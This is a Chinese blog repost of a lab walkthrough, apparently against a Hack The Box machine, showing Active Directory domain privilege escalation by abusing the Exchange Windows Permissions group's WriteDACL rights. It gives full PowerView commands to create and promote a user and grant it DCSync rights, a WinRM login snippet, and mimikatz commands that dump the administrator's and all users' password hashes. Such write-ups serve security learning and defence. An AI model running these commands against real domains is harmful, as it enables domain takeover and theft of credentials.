投稿 | 使用Exchange服务器中的Writedacl实现域提权的提权

最新推荐文章于 2024-02-28 15:44:39 发布
最新推荐文章于 2024-02-28 15:44:39 发布
阅读量778 收藏 1
点赞数
文章标签: rabbitmq acl kerberos 安全 openssh
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shuteer_xu/article/details/116725492
版权

文章来源|MS08067 公众号读者投稿

本文作者:VastSky(Ms08067实验室读者)

前言

在域环境中,如果安装Exchange后,系统会添加一个名为Microsoft Exchange Security Groups、Exchange Trusted Subsystem和Exchange Windows Permission三个组。如果获得了这三个组内任意用户的控制权限,就能够继承用户组的WriteDACL权限,WriteDACL权限可以修改域对象的ACL,最终实现利用DCSync导出域内所有用户hash。

利用条件

获取属组为一下三个组的任意用户

Microsoft Exchange Security Groups

Exchange Trusted Subsystem

Exchange Windows Permission

实验

1、通过bloodhound分析出来如下图所示

通过上图可以清晰的看到,用户所属的组对

EXCHANGE WINDOWS PERMISSIONS 组拥有所有的权限,而EXCHANGE WINDOWS PERMISSIONS 对域有有writedacl的权限,因此可以通过 域渗透——使用Exchange服务器中特定的ACL实现域提权,的思路来提权。通过DCSync来提权,EXCHANGE WINDOWS PERMISSIONS组内的用户,可以对任意用户修改acl权限

2、创建用户用户

$UserPassword =

ConvertTo-SecureString '123456qazwsx' -AsPlainText -Force

New-DomainUser -SamAccountName one -Description

'This is one' -AccountPassword $UserPassword

修改用户密码:Set-DomainUserPassword -Identity

harmj0y2 -AccountPassword $UserPassword

3、将新建用户加入到EXCHANGE WINDOWS PERMISSIONS组,并且允许远程登录

Add-DomainGroupMember -Identity

'EXCHANGEWINDOWS PERMISSIONS' -Members 'one'

Add-DomainGroupMember -Identity 'Remote Management Users' -Members 'one'

4、使用one用户通过winrm_shell.rb用户远程登录

require 'winrm'

conn = WinRM::Connection.new(

  endpoint: 'http://10.10.10.161:5985/wsman',

  user: 'htb.local\one',

  password: '1234qwer',)

5、利用DCSync导出hash

于是one用户可以对自己添加三条ACE(Access Control Entries):使其获得DCSync导出的权限,正常情况下,如果获得了以下三个组内任意用户的权限,都能够利用DCSync导出域内所有用户hash组名如下:

Exchange Trusted Subsystem

Exchange Windows Permission

Organization Management

向域内的一个普通用户添加如下三条ACE(Access Control Entries):

DS-Replication-Get-Changes(GUID:1131f6aa-9c07-11d1-f79f-00c04fc2dcd2)

DS-Replication-Get-Changes-All(GUID:1131f6ad-9c07-11d1-f79f-00c04fc2dcd2)

DS-Replication-Get-Changes(GUID:89e95b76-444d-4c62-991a-0facbeda640c)

该用户即可获得利用DCSync导出域内所有用户hash的权限

6、添加ACE的命令如下:

Add-DomainObjectAcl -TargetIdentity

"DC=htb,DC=local" -PrincipalIdentity one -Rights DCSync -Verbose

7、再次退出重新登录

(1)导出administrator的hash

mimikatz.exe privilege::debug "lsadump::dcsync /domain:htb.local /user:administrator /csv" exit

(2)通过以下命令导出所有用户hash

mimikatz.exe privilege::debug "lsadump::dcsync /domain:htb.local /all /csv" exit

扫描下方二维码加入星球学习

加入后会邀请你进入内部微信群,内部微信群永久有效!

 

 

目前40000+人已关注加入我们

Ms08067安全实验室
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
Exchange 提权
include_heqile的博客
01-07 708
在大多数的环境exchange服务器都是存在的,而且在内拥有者相当高的权限,如果我们拥有了一个exchange服务器的本地管理员权限,那么这就已经足够我们将自己提升为Domain Admin了。通过对exchange服务器的引流,我们可以达到内权限提升的目的。这个利用方式的要求极其简单,只需要拥有一个有效的邮箱账户以及密码即可。 不过现在这个漏洞已经被打上补丁了,如果没有打补丁的话,依然...
在子上安装exchange服务器
weixin_33889245的博客
08-31 394
一、如何在上子安装exchange服务 实验环境: DNS=192.168.11.1 Florence,IP=192.168.11.101,父exchtest.com)控制器 Firenze,IP=192.168.11.104,子(mail.exchtest.com)控制器 Berlin,IP=192.168.11.108,子成员,exchange服务...
ExchangeACL利用分析
lonmar的博客
11-03 627
0x00 安装Exchange服务器后会添加一个名为Microsoft Exchange Security Groups的OU,这个OU里面有一些权限很高的组。 Exchange Trusted Subsystem Exchange Windows Permission Organization Management 下面仔细分析一下 0x01 High Privilege Groups 首先是Exchange Windows Permissions这个组,这个组的权限非常高,它对整个对象拥有Write
控制器上安装Exchange 2003的注意事项
weixin_33810006的博客
11-15 117
控制器上安装Exchange 2003的注意事项 微软反对在控制器上安装Exchange,但在有需要的环境,它也支持这样做。但是,如果你发现自己确实要在控制器上运行Exchange——可能是因为预算的原因——确信你了解下面的限制,并做出明智的决策: 一旦你在控制器上安装了Exchange,你就不能将服务器还原到成员服务器状态。 一般来说,考...
Exchange Server 2013 SP1管理实践》——2.4 提升为控制器后产生的变化
weixin_34198583的博客
05-02 151
本节书摘来自异步社区《Exchange Server 2013 SP1管理实践》一书的第2章,第2.4节,作者: 王淑江 更多章节内容可以访问云栖社区“异步社区”公众号查看。 2.4 提升为控制器后产生的变化 同一台计算机部署控制器之前,计算机名称为“DC”;部署控制器之后计算机名称为“DC.book.local”。虽然是同一台计算机,但在部署...
渗透 | 利用DnsAdmins提权到SYSTEM
Ms08067安全实验室
04-12 1004
文章来源|MS08067 公众号读者投稿本文作者:VastSky(Ms08067实验室读者)一、前言 在渗透,我们获得DNS管理员(DNSAdmin)权限后,可以使用dnscmd.e...
毕业设计-基于SpringBoot的在线投稿系统的设计与实现源码+数据库.zip
06-25
毕业设计-基于SpringBoot的在线投稿系统的设计与实现源码+数据库,已获导师指导通过的高分项目。 毕业设计-基于SpringBoot的在线投稿系统的设计与实现源码+数据库,已获导师指导通过的高分项目。毕业设计-基于...
专家报告_李小玲科技期刊论文投稿过程地图插图的规范使用.pdf
08-01
专家报告_李小玲科技期刊论文投稿过程地图插图的规范使用.pdf,详细讲解了地图容易出现的问题,文档有回放链接。
WordPress实现网站投稿者也可以上传图片的方法
09-28
在WordPress,网站投稿者通常只具有发布文章的基础权限,而不包括上传图片或媒体文件的能力。这可能会限制用户提交丰富内容的积极性。然而,通过简单的代码调整,我们可以为投稿者赋予上传图片的功能,使得他们...
权限维持(ACL滥用)
qq_18811919的博客
03-28 1192
本篇文章讲述如何使用Rights-GUID方式添加ACE以及现在常见的八种ACL权限滥用的配置与利用,其使用到的工具有Admod/Adinfd/powerview等,ACL权限维持手段还是以最小权限为优,比如RBCD/重置密码/写入成员等尽量不要添加全部ACE这种在实战的时候可以尽量使用简单的权限维持手法。
Exchange Server 2013 SP1管理实践》——2.2 部署控制器
weixin_34221073的博客
05-02 166
本节书摘来自异步社区《Exchange Server 2013 SP1管理实践》一书的第2章,第2.2节,作者: 王淑江 更多章节内容可以访问云栖社区“异步社区”公众号查看。 2.2 部署控制器 本节创建名称为“book.local”的。Windows Server 2012 R2操作系统安装完成后,需要完成以下任务。 (1)重命名计算机。 (2)...
春秋云境Exchange WP
m0_62466350的博客
12-30 1058
Exchange 是一套难度为等的靶场环境,完成该挑战可以帮助玩家了解内网渗透的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法,加强对环境核心认证机制的理解,以及掌握环境渗透一些有趣的技术要点。该靶场共有 4 个 Flag,分布于不同的靶机。*注意:该靶场只有4个flag,如果提交完4个flag后仍未攻克成功,请关闭环境提交反馈。
Exchange】环境搭建
最新发布
weixin_44767199的博客
02-28 2931
exchange环境搭建,dag环境搭建
Exchange 2013 SP1部署系列10:配置数据库高可用DAG
weixin_34221036的博客
11-05 123
首先把Exchange Trusted Subsystem加入到Administrators组,由于控制器不在exchnge受信任的子系统里面,所以我们在上把Exchange Trusted Subsystem加入到Administrators组。本来我们可以不用添加Exchange Trusted Subsystem组到Adminsitrators组,因为CAS服务器...
Microsoft Exchange漏洞记录(撸向控) - CVE-2018-8581
dengzhasong7076的博客
01-22 2907
前一段时间exchange出现了CVE-2018-8581,搭了许久的环境,不过不得不敬佩这个漏洞整体超赞。 一开始主要还是利用盗取exchange的管理员权限去调用一些接口,导致可以做到,比如收取别人邮件,替别人发送邮件。 攻击控 今天出了一个更加深入的利用分析 主要是利用了ews推送的ssrf,进行ntlm relay,从http -> ldap的利用。主要还是exchang...
CVE-2021-26858/CVE-2021-27065 Exchange 任意文件写入结合Write Dcsync Acl
谢公子的博客
03-14 5165
查询内具备Dcsync权限的用户,可以看到已经有xie\hack了 hack用户拥有dcsync权限后,即可导出内任意用户哈希,导出administrator用户的哈希,远程连接控。
exchange2016 4节点完整安装之DAG配置
baonixi7102的博客
08-20 351
首先,新建数据库,设置数据库路径为E:\Microsoft\Exchange Server\DataBase\ 完成Mbox1,Mbox2,Mbox3,Mbox4,Mbox5数据库创建接下来进行DAG配置将exchange trusted subsystem添加到管理员组新建数据库可用性组DAG,输入见证服务器名称(这里选择AD作为见证服务器),输入可用性组IP地址在主控自动生成见证文件夹DA...
利用DACL访问控制列表修改文件夹访问权限
CHN的CODE世界
01-05 1517
最近需要在服务器上修改每个用户对某个文件夹的访问权限,在网上找到这个函数,试了下能用,第一个参数是文件路径,第二个是用户名,如果想把权限指定为自己想要的就修改BuildExplicitAccessWithName 的GENERIC_ALL 顺便记录个关于服务器存取控制的详细说明的博客 http://mickorguo.blog.163.com/blog/static/62194802007
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值